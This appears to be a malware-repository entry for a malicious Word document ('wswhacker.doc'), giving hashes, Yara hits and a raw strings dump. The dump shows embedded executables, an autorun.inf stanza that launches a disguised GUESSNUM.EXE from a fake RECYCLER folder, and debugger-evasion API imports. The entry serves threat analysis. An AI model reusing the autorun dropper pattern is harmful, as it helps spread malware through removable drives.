Sample details: 655d7890f348fde289ff0d5f56d23199 --

Hashes
MD5: 655d7890f348fde289ff0d5f56d23199
SHA1: 104805cd325aed892217bef251000d1e2ecf7488
SHA256: fbe64364844a95f9ee71ec94dd45989a109d08baee619b3159de499ab993762d
SSDEEP: 3072:xXXhV77w8GrxJEXhKuXhKSE1jcJE1GlJO+ePJO+eP6E1GlTzqE1ONO+ePz:d7TXJX89caqezenOfs/eb
Details
File Type: Composite
Added: 2019-01-23 20:43:17
Yara Hits
CuckooSandbox/embedded_pe | CuckooSandbox/embedded_win_api | YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/DebuggerCheck__RemoteAPI | YRP/DebuggerException__ConsoleCtrl | YRP/SEH__vba | YRP/anti_dbg | YRP/win_files_operation |
Strings
		bjbjqPqP
kfkS_)Y(W
N*N:W0W
N*N:W0W
Ye\s^0W
NsQ/f!j
l	g*Y'Y:S+R
)R(uKb
~cb(Wf
 baba0W
urn:schemas-microsoft-com:office:smarttags
chmetcnv
urn:schemas-microsoft-com:office:smarttags
chsdate
HasSpace
IsLunarDate	
IsROCDate
Negative
NumberType
SourceValue
UnitName
MC SYSTEM
Normal
MC SYSTEM
Microsoft Office Word
MC SYSTEM
Microsoft Office Word 
MSWordDoc
Word.Document.8
wswhacker.doc
bjbjqPqP
mvf>f:y
mvf>f:y
peW[>f:y
weTeTeTeTeTeTeTeTeTeT
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
8#E'R+_/
urn:schemas-microsoft-com:office:smarttags
country-region
urn:schemas-microsoft-com:office:smarttags
urn:schemas-microsoft-com:office:smarttags
urn:schemas-microsoft-com:office:smarttags
urn:schemas-microsoft-com:office:smarttags
chmetcnv
HasSpace
Negative
NumberType
SourceValue
UnitName)
Normal
Microsoft Office Word
Microsoft Office Word 
MSWordDoc
Word.Document.8
wswhacker.inf[AutoRun]
Open=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\open\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\explore\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\find\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
wswhacker.dllMZ
This program cannot be run in DOS mode.
<KL Autogenerated>
MSIMG32.dll
AlphaBlend
DllInitialize
GradientFill
TransparentBlt
vSetDdrawflag
wswhacker.exeMZ
This program cannot be run in DOS mode.
<KL Autogenerated>
KERNEL32.dll
AddConsoleAliasW
AddLocalAlternateComputerNameA
BackupSeek
BeginUpdateResourceW
BuildCommDCBAndTimeoutsA
CheckRemoteDebuggerPresent
CloseProfileUserMapping
CommConfigDialogW
ConvertFiberToThread
CopyFileA
CreateConsoleScreenBuffer
CreateDirectoryExA
CreateFileA
CreateHardLinkW
CreateNamedPipeW
CreatePipe
CreateProcessA
CreateRemoteThread
CreateVirtualBuffer
DeleteVolumeMountPointW
EnterCriticalSection
EnumCalendarInfoExW
EnumDateFormatsA
EnumDateFormatsW
EnumResourceLanguagesA
EnumSystemLanguageGroupsW
EnumSystemLocalesA
EnumSystemLocalesW
ExpandEnvironmentStringsA
ExpungeConsoleCommandHistoryW
FindFirstFileExW
FindNextChangeNotification
FindResourceExA
FoldStringW
FormatMessageA
FreeResource
GenerateConsoleCtrlEvent
GetCPFileNameFromRegistry
GetConsoleAliasExesLengthW
GetConsoleAliasesLengthA
GetConsoleCharType
GetConsoleCommandHistoryLengthA
GetConsoleCommandHistoryLengthW
GetConsoleCommandHistoryW
GetConsoleCursorMode
GetConsoleKeyboardLayoutNameW
GetDiskFreeSpaceExA
GetDiskFreeSpaceExW
GetDiskFreeSpaceW
GetDriveTypeA
GetEnvironmentVariableA
GetLogicalDriveStringsA
GetLogicalDriveStringsW
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetNamedPipeHandleStateA
GetNamedPipeHandleStateW
GetNumberOfConsoleFonts
GetOverlappedResult
GetPrivateProfileSectionNamesW
GetPrivateProfileStringW
GetPrivateProfileStructW
GetProcAddress
GetProfileIntW
GetProfileStringA
GetStringTypeW
GetSystemTimeAdjustment
GetSystemWindowsDirectoryA
GetSystemWow64DirectoryW
GetThreadIOPendingFlag
GetTimeZoneInformation
GetVolumeNameForVolumeMountPointA
GetWindowsDirectoryA
GlobalGetAtomNameA
GlobalReAlloc
HeapCreate
HeapQueryTagW
InitAtomTable
InterlockedExchangeAdd
IsBadCodePtr
IsSystemResumeAutomatic
IsValidLocale
IsValidUILanguage
LZDone
LoadLibraryA
LoadLibraryExW
LocalAlloc
MoveFileExA
MultiByteToWideChar
NlsConvertIntegerToString
OpenFileMappingA
OpenSemaphoreA
OutputDebugStringA
PeekNamedPipe
ReadConsoleInputExA
ReadConsoleInputExW
ReadConsoleOutputCharacterW
ReadFileScatter
ReleaseMutex
RtlCaptureContext
RtlCaptureStackBackTrace
RtlZeroMemory
ScrollConsoleScreenBufferW
SetCommState
SetComputerNameExA
SetConsoleMenuClose
SetConsoleWindowInfo
SetCurrentDirectoryA
SetDefaultCommConfigW
SetEnvironmentVariableA
SetHandleContext
SetLastConsoleEventActive
SetLastError
SetProcessShutdownParameters
SetSystemTime
SetSystemTimeAdjustment
SetThreadAffinityMask
SetThreadLocale
SetVolumeMountPointW
SuspendThread
TlsSetValue
UTUnRegister
UnmapViewOfFile
UpdateResourceA
VerSetConditionMask
VirtualFree
VirtualProtectEx
WaitCommEvent
WaitNamedPipeA
WriteConsoleInputVDMW
WriteConsoleOutputW
WritePrivateProfileStringW
_lread
_lwrite
lstrcatA
lstrcmpW
wswhacker.exeMZ
!This program cannot be run in DOS mode.
`.data
MSVBVM60.DLL
[QsrKPs
RsaTQs
TQs\BDs
QssADs
QsmYOs
KDs0XQsaUQs
UPstEDs
UQsPOQs
Qs"DDs
Left  Project1
 =   12
xCAT - Anti-Shutdown v1.00
Command1
Label5
Shutdowns stopped this session
Label4
Label3
Shutdowns stopped by xCAT- Anti-Shutdown
Label2
Label1
mnu_home
mnu_allow
Allow Shutdown
mnu_sep1
mnu_shutter
Shutdown
mnu_logoff
Normal LogOff
mnu_forcelogoff
Force LogOff
mnu_eferferfer
mnu_reboot
Normal Reboot
mnu_forcereboot
Force Reboot
mnu_nullzzzz
mnu_manual
Normal Shutdown
mnu_force
Force Shutdown
mnu_null1
mnu_about
mnu_exit
antishutdown
Project1
Project1
Project1
mdlStopShutdown
Module1
Module2
mnu_reboot
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
mnu_shutter
mnu_eferferfer
mnu_force
mnu_allow
mnu_logoff
mnu_manual
mnu_exit
Label5
mnu_nullzzzz
Command1
Label4
Label1
Label2
Label3
mnu_forcelogoff
mnu_forcereboot
mnu_about
mnu_null1
mnu_home
mnu_sep1
shell32.dll
Shell_NotifyIconA
ExitWindowsEx
user32
CallWindowProcA
SetWindowLongA
GetMessageA
VBA6.DLL
__vbaFreeVar
__vbaVarOr
__vbaI4Var
__vbaSetSystemError
__vbaErrorOverflow
__vbaStrCopy
__vbaRecUniToAnsi
__vbaFpI4
__vbaOnError
__vbaStrI2
__vbaStrI4
__vbaI4Str
__vbaFreeObjList
__vbaFreeStrList
__vbaStrCat
__vbaStrMove
__vbaFreeStr
__vbaCastObj
__vbaObjSet
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSetAddref
__vbaNew2
__vbaRecAnsiToUni
__vbaLateIdCallLd
__vbaLsetFixstr
MSVBVM60.DLL
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaFreeVar
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaStrCat
__vbaLsetFixstr
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
_CIsin
__vbaChkstk
EVENT_SINK_AddRef
DllFunctionCall
__vbaVarOr
_adj_fpatan
__vbaLateIdCallLd
__vbaRecUniToAnsi
EVENT_SINK_Release
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
_CIlog
__vbaErrorOverflow
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaI4Str
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaI4Var
__vbaFpI4
_CIatan
__vbaCastObj
__vbaStrMove
_allmul
_CItan
_CIexp
__vbaFreeObj
__vbaFreeStr
wswhacker.exeMZ
!This program cannot be run in DOS mode.
`.data
MSVBVM60.DLL
[QsrKPs
RsaTQs
TQs\BDs
QssADs
QsmYOs
KDs0XQsaUQs
UPstEDs
UQsPOQs
Qs"DDs
Left  Project1
 =   12
xCAT - Anti-Shutdown v1.00
Command1
Label5
Shutdowns stopped this session
Label4
Label3
Shutdowns stopped by xCAT- Anti-Shutdown
Label2
Label1
mnu_home
mnu_allow
Allow Shutdown
mnu_sep1
mnu_shutter
Shutdown
mnu_logoff
Normal LogOff
mnu_forcelogoff
Force LogOff
mnu_eferferfer
mnu_reboot
Normal Reboot
mnu_forcereboot
Force Reboot
mnu_nullzzzz
mnu_manual
Normal Shutdown
mnu_force
Force Shutdown
mnu_null1
mnu_about
mnu_exit
antishutdown
Project1
Project1
Project1
mdlStopShutdown
Module1
Module2
mnu_reboot
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
mnu_shutter
mnu_eferferfer
mnu_force
mnu_allow
mnu_logoff
mnu_manual
mnu_exit
Label5
mnu_nullzzzz
Command1
Label4
Label1
Label2
Label3
mnu_forcelogoff
mnu_forcereboot
mnu_about
mnu_null1
mnu_home
mnu_sep1
shell32.dll
Shell_NotifyIconA
ExitWindowsEx
user32
CallWindowProcA
SetWindowLongA
GetMessageA
VBA6.DLL
__vbaFreeVar
__vbaVarOr
__vbaI4Var
__vbaSetSystemError
__vbaErrorOverflow
__vbaStrCopy
__vbaRecUniToAnsi
__vbaFpI4
__vbaOnError
__vbaStrI2
__vbaStrI4
__vbaI4Str
__vbaFreeObjList
__vbaFreeStrList
__vbaStrCat
__vbaStrMove
__vbaFreeStr
__vbaCastObj
__vbaObjSet
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSetAddref
__vbaNew2
__vbaRecAnsiToUni
__vbaLateIdCallLd
__vbaLsetFixstr
MSVBVM60.DLL
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaFreeVar
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaStrCat
__vbaLsetFixstr
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
_CIsin
__vbaChkstk
EVENT_SINK_AddRef
DllFunctionCall
__vbaVarOr
_adj_fpatan
__vbaLateIdCallLd
__vbaRecUniToAnsi
EVENT_SINK_Release
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
_CIlog
__vbaErrorOverflow
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaI4Str
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaI4Var
__vbaFpI4
_CIatan
__vbaCastObj
__vbaStrMove
_allmul
_CItan
_CIexp
__vbaFreeObj
__vbaFreeStr
wswhacker.inf[AutoRun]
Open=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\open\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\explore\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\find\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
wswhacker.batwswhacker.gifGIF89a 
33333f33
3f33ff3f
f33f3ff3
ff3fffff
61"M)I
TPGEUS-We
=Xm?|t
\A $B!
A9,ER|
Fa|5^d
p\Epd'm4
 uS*%Q8
c5Zz-Z
e^~E^5
%7r%or&Gr(w
wjHu~Guy'xx7
UwMwKn
D&BQKN
phF!b| X
w\bxd"
6zc7J#7
Q*eQ6%R.%T:%S>
;wswhacker.batwswhacker.ini[boot loader]
timeout=1
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn
wswhacker.gifGIF89a 
33333f33
3f33ff3f
f33f3ff3
ff3fffff
61"M)I
TPGEUS-We
=Xm?|t
\A $B!
A9,ER|
Fa|5^d
p\Epd'm4
 uS*%Q8
c5Zz-Z
e^~E^5
%7r%or&Gr(w
wjHu~Guy'xx7
Luwv&\o
phF!d| X
Yc6bc3^
Q&eQ.%Q6%R2
;wswhacker.gifGIF89a 
33333f33
3f33ff3f
f33f3ff3
ff3fffff
#H8%`{
c_yXhB5^
4QAc4C
hD)jQ;X
]uu\CU
#%99@V
mnJ{;]
}]iI+Z
/PUXhU'
=5W>EWs
}T-8[@%
\67<&f+.f,
CWtDwt-
uU7uVG
ve7vfG
.%rA	J
%$D2`DV E2
5q$Ib$H
U^%VfeO
;wswhacker.inf[AutoRun]
Open=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\open\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\explore\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\find\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
wswhacker.gifGIF89a 
33333f33
3f33ff3f
f33f3ff3
ff3fffff
#H8%`{
c_yXhB5^
4QAc4C
hD)jQ;X
]uu\CU
#%99@V
mnJ{;]
}]iI+Z
/PUXhU'
=5W>EWs
}T-8[@%
\67<&f+.f,
CWtDwt-
uU7uVG
ve7vfG
0#J!~l
B+nV+?4
%%iCO:
G5yrV#f
A&$B"d
FV GRdFv
;wswhacker.gifGIF89a 
33333f33
3f33ff3f
f33f3ff3
ff3fffff
61"M)I
TPGEUS-We
=Xm?|t
\A $B!
A9,ER|
Fa|5^d
p\Epd'm4
 uS*%Q8
c5Zz-Z
e^~E^5
%7r%or&Gr(w
wjHu~Guy'xx7
:P{Zd'
l$NYWPq	d$
3miM[q
D.(A	84
't]	8l
D^dDf$Dn
SJeUR%TR^@
;wswhacker.inf[AutoRun]
Open=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\open\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\explore\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\find\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
wswhacker.batwswhacker.gifGIF89a 
33333f33
3f33ff3f
f33f3ff3
ff3fffff
61"M)I
TPGEUS-We
=Xm?|t
\A $B!
A9,ER|
Fa|5^d
p\Epd'm4
 uS*%Q8
c5Zz-Z
e^~E^5
%7r%or&Gr(w
wjHu~Guy'xx7
^j]!^M
phF!T| X
hF5`q'
;wswhacker.ini[boot loader]
timeout=1
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn
wswhacker.inf[AutoRun]
Open=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\open\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\explore\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
shell\find\Command=/RECYCLER.{645FF040-5081-101B-9F08-00AA002F954E}/GUESSNUM.EXE
wswhacker.gifGIF89a 
33333f33
3f33ff3f
f33f3ff3
ff3fffff
#H8%`{
c_yXhB5^
4QAc4C
hD)jQ;X
]uu\CU
#%99@V
mnJ{;]
}]iI+Z
/PUXhU'
=5W>EWs
}T-8[@%
\67<&f+.f,
CWtDwt-
uU7uVG
ve7vfG
;aJ~vB!
4cypYB
.%rA	J
D^$EFdFNd
R6%!Be
RP^%Vf
b6fb>&c
;wswhacker.ini[boot loader]
timeout=1
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn
wswhacker.batwswhacker.ini[boot loader]
timeout=1
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn